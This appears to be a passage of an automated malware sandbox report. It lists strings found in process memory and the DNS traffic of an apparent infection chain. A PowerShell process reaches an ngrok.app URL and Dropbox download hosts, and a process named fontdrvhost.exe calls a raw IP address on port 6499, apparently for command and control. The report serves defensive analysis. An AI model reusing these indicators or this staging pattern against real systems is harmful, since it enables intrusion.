https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: om/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: om/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: om/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                    Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                    Source: global trafficDNS traffic detected: DNS query: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global trafficDNS traffic detected: DNS query: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: global trafficDNS traffic detected: DNS query: uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
                    Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2228408499.00003C1000378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2228408499.00003C1000378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2228408499.00003C1000378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2228408499.00003C1000378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                    Source: svchost.exe, 00000006.00000002.3285480575.0000018A79400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                    Source: svchost.exe, 00000006.00000003.2227435676.0000018A791C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0005E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                    Source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.glarysoft.com/goto.php?a=upgradetopro&s=DiskDefrag340100134010023401003340100434010053401
                    Source: powershell.exe, 00000002.00000002.2393157557.000001BD9C41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: powershell.exe, 00000010.00000002.2521531111.0000028B71FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coX
                    Source: powershell.exe, 00000002.00000002.2393157557.000001BD9C41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.oA
                    Source: powershell.exe, 00000002.00000002.2389901126.000001BD9C366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.AppV.
                    Source: fontdrvhost.exeString found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65ge
                    Source: fontdrvhost.exe, 00000019.00000002.2755189242.0000000002DDC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gex
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324302969.000001BD83AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8
                    Source: powershell.exe, 00000002.00000002.2323457545.000001BD8206C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324302969.000001BD83AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8-UseBa
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
